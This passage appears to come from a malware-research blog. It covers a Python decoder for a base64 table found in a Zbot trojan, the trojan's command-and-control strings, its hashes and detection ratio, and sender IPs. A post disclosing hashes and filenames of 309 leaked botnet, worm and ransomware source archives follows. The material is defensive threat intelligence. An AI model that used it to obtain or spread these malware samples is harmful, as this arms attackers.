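TABLE_STRING = r"|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq"

B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Inferred layout (assumptions; is_base64_decode_table checks them):
FIRST_CHAR = "+"       # table index 0 stands for '+', the lowest base64 character
OFFSET = ord(">")      # each entry stores alphabet index + 0x3E, so '>' means 0
INVALID = "$"          # sentinel for characters that are not in the alphabet

def decode_lookup_table(table=TABLE_STRING):
    """Turn the packed string into {character: 6-bit value}."""
    mapping = {}
    for i, entry in enumerate(table):
        if entry != INVALID:
            mapping[chr(ord(FIRST_CHAR) + i)] = ord(entry) - OFFSET
    return mapping

def is_base64_decode_table(table=TABLE_STRING):
    """True when every standard base64 character maps to its own index."""
    mapping = decode_lookup_table(table)
    return len(mapping) == 64 and all(mapping.get(c) == i for i, c in enumerate(B64_ALPHABET))

def b64decode_with_table(text, table=TABLE_STRING):
    """Decode base64 using only the recovered table, no stdlib base64 module."""
    mapping = decode_lookup_table(table)
    out, acc, nbits = bytearray(), 0, 0
    for c in text.rstrip("="):
        acc = (acc << 6) | mapping[c]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
            acc &= (1 << nbits) - 1      # keep only the bits not yet emitted
    return bytes(out)

if __name__ == "__main__":
    print("looks like a base64 decode table:", is_base64_decode_table())
    print(b64decode_with_table("TWFsd2FyZU11c3REaWU="))
```

Recognising this table matters for triage: a binary that carries its own base64 decoder next to HTTP verb strings is decoding something it receives or sends over HTTP, which is consistent with the C&C traffic described further down.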
Botnet connectivity via HTTP/1.1, also as per the previous sample, has:
GET
HTTP/1.1
Connection: Close
Authorization
Basic 
GET 
POST 
div
script
nbsp;
connection
proxy-connection
content-length
transfer-encoding
upgrade
chunked
keep-alive
close
Botnet commands:
DELETE
HEAD
PUT
CONNECT
OPTIONS
TRACE
COPY
LOCK
MKCOL
MOVE
PROPFIND
PROPPATCH
SEARCH
UNLOCK
REPORT
MKACTIVITY
CHECKOUT
MERGE
M-SEARCH
NOTIFY
SUBSCRIBE
UNSUBSCRIBE
PATCH
PURGE
Here's VT's detection ratio for the Zbot, which is too darn low:
URL is here -->>[VirusTotal]
SHA256:40b4fa7433319d2b4d2fc8e8265547665e6492d3d64d0ecc2b30108b8d732a1c
SHA1: 4f3fda6c688c11a2a15bf88fb1ff005dc0045324
MD5: aa8463f91cd44a436d2468b33c2cafbb
File size: 298.5 KB ( 305664 bytes )
File name: PXVYGJx.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 2 / 47
Analysis date: 2013-06-04 08:46:46 UTC ( 2 hours, 55 minutes ago )

Fortinet                 : W32/Kryptik.AGAJ!tr
McAfee-GW-Edition        : Heuristic.LooksLike.Win32.Suspicious.B

Overall Network Analysis (To aim CnC)

A set of this infection will make outbound traffic like this:
Which shows the Zbot trojan downloader hosts below:

With the unique DNS requests as below:

Incoming UDP via local port 25916 is detected from the below IPs:

81.133.189.232
95.234.169.221
211.209.241.213
63.85.81.254
108.215.44.142
142.136.161.103
PoC:

These are the source information:
Additionally, this is how our data got sent to the pony panels:

Samples


The sample is shared for the research purpose and raising the detection ratio.

Download is here -->>[MediaFire]

Additional

#MalwareMustDie!

Monday, June 3, 2013

Full disclosure of 309 Bots/Botnet Source Codes Found via Germany Torrent

Background

If you read the post's title well, this post is exactly as it says. A shocking one, and it took us a long time to confirm the source codes one by one until we were pretty sure that the data is valid.

The data was found by our team member (thanks for the great and swift follow-up) after receiving an anonymous hint: a torrent account was found which led to a file share containing these malicious contents. The account is under legal process with the authorities and we grabbed all of the data as evidence; shortly after we retrieved the data and had some "one on one" battle, the account was closed and the shared files were suddenly deleted.

The malware source is a bit old, mostly data from 3-4 years ago; most of them are bot/botnet client source codes of various malicious implementations, and some of them are still considered "usable" stuff. After a long internal discussion, we decided to fully disclose the information for sharing purposes to the AV/security industry, authorities and known researchers only; sorry for the inconvenience that might occur, please contact us for the sample request together with your introduction (as good guys with credentials *smile*). Upon an approved request we don't provide a download URL; we will push the specific sources requested via FTP (the reason is: big size & security purposes), so please prepare your temporary FTP/FTPS account. I mean FTP, meaning no Dropbox, no Google Drive, no file sharing, and please no arguing about this, since we have our own security reasons. In some cases we will demand PGP/GPG keys for validation.

Below are the categories (covering PHP, UNIX and Windows native C code):

Login Brute Forcer Bot
IRC Bot
WebShell
SqlInject Attack Bot
Virus/Malware Botnet Client
Spyware/Backdoor Bot

Snapshot

Some dangerous bots (snapshots in pictures):

Ransomware:

UNIX Bot (Client):

Sql Brutter Client:

IRC Worm:

ZeuS:

Hashes

The complete list of the samples:

DATESTAMP   TIME  MD5                              SIZE       FILENAME
------------------------------------------------------------------------------------------------------------------
2009/06/12  19:28 f3c4064ffc78852d07c4cb3f6b23f159    438,881 (rbot)x0n3-Satan-v1.0-Priv8-By-CorryL{x0n3-h4ck}.rar
2009/06/12  19:29 6c156b3e3fe269385076880bce7fc094  2,591,697 120 Moded By t0nixx.rar
2009/06/12  19:30 276717078dda96ddd1fa7da10bdaed99  1,861,648 120-MYSQL-V2.rar
2009/06/12  19:30 fda4772759e01da0ea6e3fbd29c5dddb  1,834,838 120-MYSQL-V999.rar
2009/06/12  19:29 49a53e3490283199c43c38d7833e36ad  1,598,898 120-MYSQL1THREAD-V2.rar
2009/06/12  19:30 3bfd0b7d99b578ac9262ed5c737a230c  1,846,551 120-MYSQLBRUTE-V2.rar
2009/06/12  19:30 eccbec0caf7be85f513b37a290ffbe06    311,471 120-PSTORE-MSSQL-SYM-NTPASS-VNC-NETAPI-2007.rar
2009/06/12  19:30 9888a260793b4cc1ce42e2238b94edc7  1,629,967 120-VnC-Brute+pStore.rar
2009/06/12  19:28 f025eae0375ff22154c6972fb60adfcf    159,305 120-[BruteTest]-V0.5.rar
2009/06/12  19:28 56ef53170406d8ea82154a1d1a65b964    329,645 120-[DVNC-TEST]-DDOS-V1.0.rar
2009/06/12  19:28 6c6aba1e5af4c3d6d558d6871e02118d    233,800 120-[ModBot]-SNIFF-VNCBRUTE-SP2FIX-NICK.rar
2009/06/12  19:28 13c08d0b13b3e75bf8f6ddbfb1e43ceb    243,298 120-[ModBot]-SP2FIX-SYM-VNCBRUTE.rar
2009/06/12  19:28 70da6fc1586ac3cd0a025ea0e6aad31a    146,865 120-[ModBot]-V0.5.rar
2009/06/12  19:28 ea6fc0ea066d3e835ef28a1c90949660    312,882 120-[ModBot]-V1.0.rar
2009/06/12  19:28 5b6c4675e1616e51da2bfdc6213148f7    265,415 120-[ModBot]-VNCBRUTE-MSSQL-2007.rar
2009/06/12  19:28 74fd34fc2b497602237402bbaedba8a2    240,382 120-[netapi-sym-mohaa]-(vncbrute-sp2patch).rar
2009/06/12  19:29 ad693fb4e2313fdc78b883c417f8ad3a    207,623 120-[SP2-PATCH-BRUTE]-V2.0.rar
2009/06/12  19:29 342aefc091d1e82cb8813e7bba535dda    196,201 120-[SP2-PATCH]-V2.0.rar
2009/06/12  19:28 4800ee7bc8a9e3f4d8a4f82722f02c42    228,752 120-[SP2FIX-VNCBrute-Mohaa]-STRIP V1.0.rar
2009/06/12  19:28 24ff016f81aa71a20df1226255960f12    240,027 120-[SP2FIX-VNCBrute-Mohaa]-Test V1.0.rar
2009/06/12  19:28 cac14cb51f4ece12a357759ac82df8dc    227,567 120-[SP2fix-VncBrute]-FINALV1.0.rar
2009/06/12  19:28 68c45a875dba68c638e1cb8d139d118a    283,206 @@ SKUZ FIXED DDOS @@.rar
2009/06/12  19:30 a05ef342a2d0059a6ef895a18d43922c    514,428 a.rar
2009/06/12  19:30 eef69909a5e0598b1045f16771e316dd    991,860 a59base.rar
2009/06/12  19:30 64f9e1ae1e6a578ffee4b9fb32868d45      8,460 acidBot.rar
2009/06/12  19:30 52670ac6c7bb1f7e971b0b6c7f28b146     10,821 acidBot2fix.rar
2009/06/12  19:30 9f8dc19511a188e8fdbd3f454d92df60      6,224 acidbotEncypt.rar
2009/06/12  19:30 1530eb627c220286792abbf0658c5b7a      7,841 Ad Clicker Bot - Private - Free-Hack VIP Tool.rar
2009/06/12  19:30 90a02f5853087a9f08ed4fddada1f81e  1,470,160 agobot3-0.2.1-pre4-priv.rar
2009/06/12  19:30 17488ed87161e959bf9ea1f25d206d78     66,405 AkBot-IRC--lsd-mod.rar
2009/06/12  19:30 9842020705382d29a3c3bc23dd2103f7     90,263 AkBot-x0r-dns.rar
2009/06/12  19:30 5c4e92b534053bb0217199ec7d85bc24    168,342 Akbot_v0.4.1_netapi_.rar
2009/06/12  19:30 20635cea0f079ca7cd4395da99f05a62    142,885 asn-pstore-spam.rar
2009/06/12  19:30 ed9f49a1bb5bf552c34fc5b8d942269b    141,693 aspergillus_1.3.rar
2009/06/12  19:30 9030d27bf842ff8233752724e10c7c81    402,767 bBot-Version_0.6.rar
2009/06/12  19:30 de08fa387c1148568104d61d7b8ae609     17,502 BioZombie 1.5 Beta.rar
2009/06/12  19:30 7a232e2c7ef0085d0fa1c4eb859d20d8    112,302 blacksun.rar
2009/06/12  19:31 99d56b1460686e0da2a1e1586cb021cd    278,984 BlowSXT.rar
2009/06/12  19:31 1fb2d733cf36e9d352dbb999fba0ea2c     60,462 bmw.rar
2009/06/12  19:31 1cf0cd89a05814fadddc835934226bb3     43,176 bot mods.rar
2009/06/12  19:31 2b36670d863e7a89586c6137a8f30d82    269,740 botnet200.zip
2009/06/12  19:31 e1dc44e0de020ecd29e5c1a0eaa93a8d      3,270 Brainbot_v1.5.zip
2009/06/12  19:31 fe7f5c930537a25c676c317f0f7ede55    185,794 CBot-Fixed Version.rar
2009/06/12  19:31 59a95e39a104798872084ab1954e42f1  2,119,050 ChodeBot C++ v1 base.rar
2009/06/12  19:31 54d994b223b34aa3793dac250f69ecb7    197,682 ciscobawt.rar
2009/06/12  19:32 7416e613bd89dc18876ee54054e2e28e    645,293 Crackbot_v1.4b-final_spin.zip
2009/06/12  19:31 e41507022a1c46d4667586150d6bff2e    192,638 Crx-realmbot.VNC+RFI.rar
2009/06/12  19:31 b38bdca4ae6d993258ff7b341ef641d3    197,107 Crx-realmbot_VNC_exploit.rar
2009/06/12  19:31 d826b47ee22d43edcc3e91213d7a6fa1    131,999 CYBERBOTv2.2-Stable.m0dd_ownz.DreamWoRK.rar
2009/06/12  19:31 b4bd7566c8f52504def1520daa619f10     89,904 CYBERBOTv4.0.rar
2009/06/12  19:31 b01e2800778e0356a7125d0b169016cb     19,352 C_15Pub pre4.c.rar
2009/06/12  19:31 aef6eeec9dab3614040924a42bc1e59a     26,398 C_15Pub.rar
2009/06/12  19:31 00c39caedea5396e5ef752c7124b6478    209,817 DarkAnalNKX-BACKDOOR-REMOVED.rar
2009/06/12  19:31 0cc93898910b2e28d11bcd6015df2d95    514,997 Darkness IRC Bot.rar
2009/06/12  19:31 4c736cb10035c4c1d938dd56a9392e73    470,970 Darkness.last.mod.rar
2009/06/12  19:31 613e31fde44dfb58bc5827382a6d2121    116,307 dbot-irc-sell.rar
2009/06/12  19:31 f47bde579b059da5d2100dc3d57addb6     67,747 Dbot.v3.1.rar
2009/06/12  19:32 c3c889b923b47f051b6aec0dac9c6b9b  2,676,329 DCI Bot.rar
2009/06/12  19:32 4f7e093d42e53daba32eb4be642ceab6    817,799 dci_bot.rar
2009/06/12  19:32 28088545580766d59a5980bb166262ab    100,233 dopebot.rar
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.rar
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.uncrippled.rar
2009/06/12  19:32 53bf7302b4d1652f82d66f810d8ee941    107,161 dopebot_2.0.rar
2009/06/12  19:32 64e29da4acd67784ac7902a8a7d5778e    128,622 dopebot_current.rar
2009/06/12  19:32 9f888ff2dff506e1275857865f8273ba    251,418 drx_realcast_woopie.rar
2009/06/12  19:33 a34bbb6b2ab99869ca9ce040954e1a54  1,113,713 fiesta Sploit-pack.rar
2009/06/12  19:33 2809919d7df5c98fb8d72179759b1271  2,776,404 ForBot_Olin-SYM-VNC-NETAPI-All_The_Public_Shit.rar
2009/06/12  19:33 1a5a554cf0d51a946bb39b41afb127d7    691,904 ForBot____sniffer__other_mods-_ch405_.rar
2009/06/12  19:33 94569dfd1e3c39b0887b15602d1282b4    910,480 frozenbot6.rar
2009/06/12  19:33 be9041ce8838fd8cc3fa19c9231307b4    218,854 fukj00.rar
2009/06/12  19:33 dc163d64564178a5228be6904e1a1afc     74,862 fungus.rar
2009/06/12  19:33 8f237784ce29a851a2c10e091bc7647f      1,365 fxBot_beta_.rar
2009/06/12  19:33 99013df00a00db8377a37edf96f43710    450,355 g-spotv2.0.rar
2009/06/12  19:33 cce327ac783ed2e03f3804a4711b2980     98,338 Gellbot_3.rar
2009/06/12  19:34 9f62032cec5bf5a6829f8f8ed62b4740    943,873 GENTOOreptile-base.rar
2009/06/12  19:33 e0e204b89ee612879184473714aea2f5    405,270 GigaBot-DCASS.rar
2009/06/12  19:33 e35b3b428bae342f9e9b5c416a444111     20,944 gsys3_final.zip
2009/06/12  19:34 1bcc13ffc13a60b61cc20de05323f78c    477,851 gt-badteam.rar
2009/06/12  19:34 7c9081af12474e58bf877e04f1fb6173    639,102 gt-virtualslut.rar
2009/06/12  19:34 f508da5fe53f643838b07bdb31f6173a    631,223 gt.zip
2009/06/12  19:33 a56fa0c5bc1f9adfcdbf10af4e40e958     18,085 gtbot-hackersteam.zip
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader.rar
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader_2_.rar
2009/06/12  19:34 4ba2a256f576f49fa6ddcc8b3ca850d3    461,610 H-Bot M0d 3.0 M0dd3d by TH & Sculay.rar
2009/06/12  19:34 4a242f6d83c001d6737ac1b743005784    582,435 H-Bot_M0d_3.0_M0dd3d_by_TH___Sculay.rar
2009/06/12  19:34 dc958fff0f8538c6cb1a1816b16b2586     16,116 h3xb0t.rar
2009/06/12  19:34 bc0d89415675a722f2af74b0c174ad29     28,672 h4x0rb0t_2.0_gt_edition.zip
2009/06/12  19:34 2ba073919798b49fda385298fe64d935  1,198,546 harvecter_bot.rar
2009/06/12  19:34 131e297fcb7b4097327352b11c078982     94,865 hdbotv0.2-ciscoscan.rar
2009/06/12  19:34 115881fb06d2ab57abf8afb7f4ae1815     88,956 hellbot10-06-05.rar
2009/06/12  19:34 3acba4c7f32087368937d7b4fdc29038     62,560 hellbot3[10-06-05].rar
2009/06/12  19:34 19b1ea7eb040789fa35d4e31909da225     90,126 hellbotv3.rar
2009/06/12  19:34 e1688beaf7b28f279abb90da00faeee8     16,905 hydra-2008.1.zip
2009/06/12  19:34 40a3282cf7e1d832ddfb4e6c33fc0252     17,443 I1.4b0.rar
2009/06/12  19:35 e09d194f790134f500c4c30aa0ff2388  1,231,092 icepack-ie7 mod.rar
2009/06/12  19:34 9d08ed0af3b70cd4fa0858698071c7d6    199,267 IHS-H-A-V003-Exploits.zip
2009/06/12  19:34 e23d9fde0bb6c1d84344bb291ad6afb3    495,581 iis-gt-bot.rar
2009/06/12  19:34 b7bb59167431b696a400c076b83ca22c    224,062 illusion_bot.rar
2009/06/12  19:34 3434dd0e03e545c647d0026d57dbb83b    248,553 Imbot1.3_V3.1.zip
2009/06/16  01:31 9d7f2f4c776062f7eb1300142bb44f6b     80,290 IMbotMod_V4.1.zip
2009/06/12  19:34 299ad5de20ba8c3c9182fdcb33016bc6    207,505 IMBOT_MOD.rar
2009/06/12  19:34 8493cbdc1fcb1caf3f32b9a8a548b179     97,313 IMBot_SRC_$$.rar
2009/06/12  19:34 eba95d73077c762dfd5c05fd871db38a    170,393 InTeL_m0dd-Test101-ms0640.rar
2009/06/12  19:34 2968af1c1a9ca3c1b8258f5902ec91c6    105,750 irbot0.15.rar
2009/06/15  20:15 ce35769c0538f13f599dcc5c0b6d9e96  2,555,449 ircd.tar.gz
2009/06/12  19:35 8e4c53d9673e44ff9df410288c5f0050     34,728 IrcWormv1.3-SourceCode.zip
2009/06/12  19:35 c52acf3396793f97bda614252bd8492d  1,991,254 IrINi_bot_0.1_public_limited_version_for_win32.rar
2009/06/12  19:35 63e0c87e11fd8e46111a5e734975d9f0    662,071 italian.zip
2009/06/12  19:35 ae71290e63db49bdda0ae0b0b8bfe88f    296,592 JRBOT_Modded_By__bloody_.rar
2009/06/12  19:35 3f7cf217ec499ba9d34e86e47cf08efe      8,643 kaiten.c.rar
2009/06/12  19:35 8dd36535dc8af32d6f398706b7f63c3e      7,322 knight.rar
2009/06/12  19:35 e44a741b6507ad9bb14c1ccd152a48ed      5,586 KoBRA-RFISCaN.EDiTEDBYBRaT.rar
2009/06/12  19:35 6cee5d68699c496c59afa6d9aeb2c75b     11,201 l0lw0rm.rar
2009/06/12  19:35 7f0657b3fb5ec9b67ce2487a8040ca05    227,961 LiquidBot_FixEd_By_Pr1muZ_anD_Ic3.rar
2009/06/12  19:35 4e8a71749ece0c3209f40c0304d1c7e2     86,201 litmus2-bot.rar
2009/06/12  19:35 4e8a71749ece0c3209f40c0304d1c7e2     86,201 litmus2-bot_2_.rar
2009/06/12  19:35 d43da1e84969c2eb0ba1ef760681e671      2,751 Lnknell.rar
2009/06/12  19:36 cbdbc295c611f1b1c6dcf11da45e4878  2,028,539 LoexBot.rar
2009/06/12  19:35 db5420ab2a883ed938aae77429573135    128,635 M0LdBotv1.0-small.rar
2009/06/12  19:35 9d90100354b9efeae6fc3f57ab0a036d    249,373 mm0d_asn_.rar
2009/06/12  19:35 9d90100354b9efeae6fc3f57ab0a036d    249,373 mmodbasn.rar
2009/06/12  19:35 f8bede07136fb166a0b4d197a24c7723    327,656 ModBot V1 Mod by iNs v0.2.rar
2009/06/12  19:36 1b521746de9dc8c77658d5bf9ed46786  1,387,852 MSDN(mirc scan bot).rar
2009/06/12  19:35 4ba39b27d1976eabc28cd71e515fac82     33,627 MSITBotWin.rar
2009/06/12  19:35 45b6ce6fef7e3e2d5769a3c2a1979daf     45,149 MSN Spread Bot Priv8.rar
2009/06/12  19:36 003a33c8e9701722179c99980bfdbfac    247,232 mystic-Urx.rar
2009/06/12  19:36 2d7328e87f0570a3bbd2ebdf76183cc7    240,673 mystic-Urx_Fixed_by_Pr1muz.rar
2009/06/12  19:36 88eac4e54021a2cf0ca8137f35b21bc2    647,269 my_poly_sploit ie6-ie7-op-firefox.rar
2009/06/12  19:36 8e4c63ff630c591d36dcb64dd7e1c15b    116,659 Nbot.rar
2009/06/12  19:36 3d0e097817ebd904fecd4645b8186b14    110,060 nbot032-update-5-28-08-enc_07-10am_.rar
2009/06/12  19:36 2d1927aa1a0a05d9e6ed1f8a4bc83579    213,512 NESBOT_v5.rar
2009/06/12  19:36 cb6e2ab433ddd93acc92b8127c408168    149,543 nesebot1.1r-ASN-PNP.rar
2009/06/12  19:36 ea9433508e84ece9647389999491a472    206,253 nesebot1.2.rar
2009/06/12  19:36 4bd17a046c2c34cd65210f386af85cb8    252,529 Netapi.Prueb-Norman.2oo6.Prif-Jessi-Off.rar
2009/06/12  19:36 4f1a198048010bebe6a496c2b6482756    211,737 New Folder.rar
2009/06/12  19:36 4d691657be055879d7961a5ccf845f1b    232,021 New_NZM_netapi_bot.rar
2009/06/12  19:36 1650de57781e5e2145c4aeebdc5c6ad5     14,946 niggerbot-vnc-nocrypt.rar
2009/06/12  19:36 8fc87d29d7ac4933c61a2c73df3174e8     94,040 NinjaBot.rar
2009/06/12  19:36 53ad266492c5ac6a166c2281e6bd2130     20,208 NITE-AIM.rar
2009/06/12  19:36 df8d52c0d08e277cc43c472dca2ed8cb     42,667 NtScan-rbot.rar
2009/06/12  19:36 96691ea655bf3dee6101a4af666d99b9    112,504 nullbot[2.1.1] [23-11-05].rar
2009/06/12  19:36 c14512df73863f6520fc04f095f74858    112,489 nullbot[finals].rar
2009/06/16  01:31 2c1c70b4fbbd2652051f6a8e48fc9ad7    252,691 NzM 3.0 By Ph3mt.rar
2009/06/12  19:37 1b2ef2799610f4db8fab315bd269123e    866,864 nzm-netapi.rar
2009/06/12  19:36 b2c297155d283e15aaa7de677ce1c831    447,772 nzmlite_sql.rar
2009/06/12  19:36 96045f06b6fe0b10ab8876a0ee120402    221,135 nzmlite_symantec___.rar
2009/06/12  19:36 5f6ebad8d78f6a60d9b2a084e503b855    401,538 nzm_priv_shit.rar
2009/06/12  19:36 36605f658061064219b2c7364250f478     66,557 oscar.rar
2009/06/12  19:36 4ff53675ff4cdd829da9b0a42f358e81      6,948 pBot.rar
2009/06/12  19:36 54566f2c6d73bd7837a5a51bfcaf38e6      6,397 pBot_v2.rar
2009/06/16  01:31 97351e9d23d352e6aa1f2b62e55f37c2    327,680 ri0t[v5].rar
2009/06/12  19:28 787edfdfdc5610c9f4b8cfb77de93399    533,970 _dkcs_ddos_bot.rar
2009/06/12  19:28 02cd4a3f219739942fb3f74468318f99    714,852 _Radmin-scanner_-EcKstasy.rar
2009/06/12  19:28 02c1edcbc84d3e1a173a377955c43bd6    677,164 _sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE_.rar
2009/06/12  19:40 6f1965b7156d0f45702b54f1ab1dcf9b   8,330,434 Phatbot-gh3tt0Bot.rar
2009/06/12  19:38 468c6a889d70027bef6e1b36915f6c88   3,072,230 Phatbot-NortonBot.rar
2009/06/12  19:38 343890fa7a2bf1456be638419d45302d   1,940,198 phatbot-SkYKr3w.rar
2009/06/12  19:39 7139728433d292be62fe205e6a17b76a   3,348,672 Phatbot-stoney.rar
2009/06/12  19:37 85a8b554fbecc76b04d584be7e023983   1,316,528 phatbot[11-20-04][PCAP][SYNSCAN].rar
2009/06/12  19:37 e0a856cdd29f7a94d5c55ceac9b942fc   1,500,349 phatbot_alpha1.rar
2009/06/12  19:38 dcc4bc9260c9b9b45900a30b4e3758f2       5,532 phb2.rar
2009/06/12  19:38 afc6284bb1e5ea18897c77708c6a7476       3,464 php_bot.rar
2009/06/12  19:38 dfa368e6624d8dc7e03a7e2c35d3e4e3     278,407 plague.gecko.netapi.rar
2009/06/12  19:38 f629aaf7d78d9020d8620407d84e0346     357,695 pr1vsrc-nzm-m0d-by-ibby.rar
2009/06/12  19:39 e6b2deed37a64d027fd537f4ecc062c3     247,327 private_enzyme_rxmod_04-04-05.rar
2009/06/12  19:39 7a76d91b3ac04e15e74e9a127553720c     257,317 prueva[1].Netapi.asn.m0dded-Norman.rar
2009/06/12  19:39 f8929c235aa51ded4f94e32cc778c4e4     247,912 prv_nzm-rx.sp2fix.rcast.rar
2009/06/12  19:47 63d5ce47604dd47e658be563606c7af8  19,031,884 PsyProxy.zip
2009/06/12  19:39 ee5de8ed6a9e8ae2fe1304222bd668a3     246,038 pwnBoT.rar
2009/06/12  19:39 fa302cd7352ad3e8420fa3ec8924f842       8,372 q8bot.zip
2009/06/12  19:39 f4ed84cdef31f7235f163d20668edf97     216,679 r00t3d.asn.ftp.lsass.by.Morgan.rar
2009/06/12  19:39 78c02f7ec3b5af667cccd7a2d3754f07     130,140 RAGEBOT.rar
2009/06/12  19:39 9a6d2a549b4ea49e3ede33b2f8957cb1     102,702 RAGEBOT[Clean].rar
2009/06/12  19:39 b946350e3f2348bf578803919ba9f65a      18,016 RansomWar.rar
2009/06/12  19:39 e61ca1f98b33e10a0f14e885ebdd2510       6,200 Ravbot.rar
2009/06/12  19:40 18dcba301450a14e3261225163991de3      28,629 rbot-LC-Priv8.rar
2009/06/12  19:41 36d130cbfd1fccb685ad42f303997a04     288,289 rBot-sxt-harro.rar
2009/06/12  19:40 20d6865263e96848754353930ffc3c74     120,044 rbot0.2-scionix-102b-working.rar
2009/06/12  19:40 88e0d9bfaf3dccc46230dc6d70495688     159,057 rBot0.3.3Pub.rar
2009/06/12  19:41 e86d83476b327e7df82d4cf43eb733b3     220,647 rBotv0.6.6-privlsass.rar
2009/06/12  19:40 839e1825a9580a03032de1bbf46b6059   1,169,550 rBot_0.2-MODE-by-akusot.v1.5.rar
2009/06/12  19:40 72dd0e30b85f0b3e64198520afa584da      72,666 rbot_dnsquery2007.rar
2009/06/12  19:40 0441ceff1c609627e0028c066e1a519a     415,849 rbot_netapi_vnc_ipswitch.rar
2009/06/12  19:40 234a3f399969dd621c71c6add8cc2a47      66,993 rBoT_oTh3R-dImeNsIoN_4.4x(2).rar
2009/06/12  19:40 234a3f399969dd621c71c6add8cc2a47      66,993 rBoT_oTh3R-dImeNsIoN_4.4x.rar
2009/06/12  19:41 62bc8519bf3eb573c58f23494b36ab00     247,426 Release no_cpp.rar
2009/06/12  19:41 2f4327515aff4a16196e460d55658382     317,296 reptile-small.rar
2009/06/12  19:42 d6a4075a7edbf3f6a8d24eae3c13bfbe   2,458,703 reptile.04.pnp.asn.ftpd.reload.rar
2009/06/12  19:41 82e4700bbd4e81643cb9f69dbe887ede   2,428,941 reptile.rar
2009/06/12  19:41 a92d4c607a2a4877b39b9e4a5399525b     234,311 Reptile._small_.DMG.Fixes.0x1FE.rar
2009/06/12  19:41 5a0e13a825e520c785848653e1fca8f4      97,352 rezo.ninjabot.zip
2009/06/12  19:41 53e7e66ffe37fc1d96c56dbec771d9e6     317,064 RFI-SCAN.V2.PRIVATE-1x33x7.rar
2009/06/12  19:42 f0a504aa728922406552dbfddd18df23     851,993 ri0tv5.rar
2009/06/12  19:42 1530ed8db18f47c23e9b94837865c93a     760,056 ri0t].rar
2009/06/12  19:42 c8ec81bb03371c8a176cb6e2589fb8c8     158,637 ri0t_v4.rar
2009/06/12  19:42 5cb7edb4ad178fb63b5d443dbf413798     344,515 ri0t_v5_.rar
2009/06/12  19:42 15de82b050ed3def8c3c7c8c0aa9e7a0      66,789 RNM5-Priv-Pr1muZ.rar
2009/06/12  19:42 bbba5301ca57ea9337720695861a3c62      72,004 rnm5b.rar
2009/06/12  19:42 fb6afedb3ab60fb63f9902fbef710aab     107,604 Rose v1.3 2007 by DreamWoRK.rar
2009/06/12  19:42 2053825af23c7ff10027d4c0d734daa8     200,570 Rose1.1.rar
2009/06/12  19:42 869243cb22e16b96b7ec60fa8f8f5a3c     268,082 Rose_2008.rar
2009/06/12  19:42 f2d9e3b23729e9d46043c77ff962badc     145,470 Rose_v1.3_2007_by_DreamWoRK.rar
2009/06/12  19:42 3bcf15b667707be1bab0d94b5b1a7380     127,851 Ruffbot1.2-MassAsnPrivShit-150705.rar
2009/06/12  19:42 d1744451650673b13465aec4b765f22f     425,351 Ruffbotv2.rar
2009/06/12  19:42 f53ad631bbccf511b883b55d6f1bdf1b     174,378 rx-14-09-06_Netapi_doyley.rar
2009/06/12  19:43 a27f77bf36e62ecb2032f401b6ee3204     324,778 rx-AKMod___msDTC1025- Stripp3d------sc4nn3rz.rar
2009/06/12  19:43 ec2561b44a61d041c398574086785e0c     319,638 rx-asn-2-re-worked v3.rar
2009/06/12  19:43 1e67d41177165910e435287db306a5d1     323,336 rx-asn-2-re-worked_v2.rar
2009/06/12  19:43 901c4b3f29a5cb17759bfab16834e57b     333,391 rx-asn-2-re-worked_v3.rar
2009/06/12  19:45 af68b52c74732143ebc8bbdb787fe02b   1,419,782 RX-GUTTED.rar
2009/06/12  19:45 aae2f25f6a723963c71367aee9423570     197,060 rx-sky2kpnpprivate.rar
2009/06/12  19:46 c13f005a869f4e94442bfb44181c7fbc   4,976,033 RX-STRIP-BOTKILLER-0.5.rar
2009/06/12  19:44 69b427aa15549ecfe51279f7b4469cb7     257,880 rxbot-EcLiPsE cReW 1.1.priv.rar
2009/06/12  19:44 69b427aa15549ecfe51279f7b4469cb7     257,880 rxbot-EcLiPsE-cReW-1.1.priv.rar
2009/06/12  19:44 3e3aa7373a0edbfb2dabeeafa4aa6813     284,100 RxBot-MP.rar
2009/06/12  19:44 576bc25b74b1db3a326a72d106a6a2b7     142,874 RXBOT-RevengE2005pnp.rar
2009/06/12  19:44 51d41661674d19d199f1d00b34565e6a     283,581 rxBot-sxt-harro.rar
2009/06/12  19:45 182b9c39d50551e35acb9dc59e194b67   1,011,736 rxbot-xerion-2.0.rar
2009/06/12  19:43 9a9e3aaf4ffd6de3a56cf71f614676c7     266,640 rxBot0.6.6b-priv-stable-CoKeHeAd.rar
2009/06/12  19:43 fdbc9c8665f8bccd6b521e8091f57f65     302,520 rxbot2006.rar
2009/06/12  19:43 40d47769b8cbb15bf3d7511510af8695     605,643 rxbot7.5.rar
2009/06/12  19:43 90e086817c78266f9009e53085b126c6     231,691 rxbot_0.65.zip
2009/06/12  19:43 a9ba6ca3eb4f040c3c7fca1ace9515a2     217,103 Rxbot_7.6-Modded-Tr0gdor.rar
2009/06/12  19:44 a9ba6ca3eb4f040c3c7fca1ace9515a2     217,103 Rxbot_7.6-Modded-Tr0gdor_2_.rar
2009/06/12  19:43 35481b70cdcc19d97eb63cf7bc8cb8cf     179,516 Rxbot_ak_7.7_fira_pviv8.rar
2009/06/12  19:44 f907e1af2bb422836f3302f4dcf23304     130,797 rxbot_undertow-6-10-05.rar
2009/06/12  19:44 5d88290eca0ad4478d75059f5ddf0c9e     210,216 rxbot_undertow-6-6-05ASN.rar
2009/06/12  19:44 af35f62151da19b2c5d419473bef33c2   2,047,507 rxbot_undertow[PnP]modded.memcpy.0.2.rar
2009/06/12  19:44 bef073118968d7bf99b195474a2c7cee     157,149 rxbot_v0.6.5_pk__lsdigital_spreader.rar
2009/06/12  19:44 3b62b52cae6a2942ecbf34d684c7619c     227,347 rxBot_v0.7.7_Sass.rar
2009/06/12  19:43 2121a41a5b764c4ec0557b42f24b2fc7     289,581 RXB__tM__d-VNC-NETAPI-ASN-2006.rar
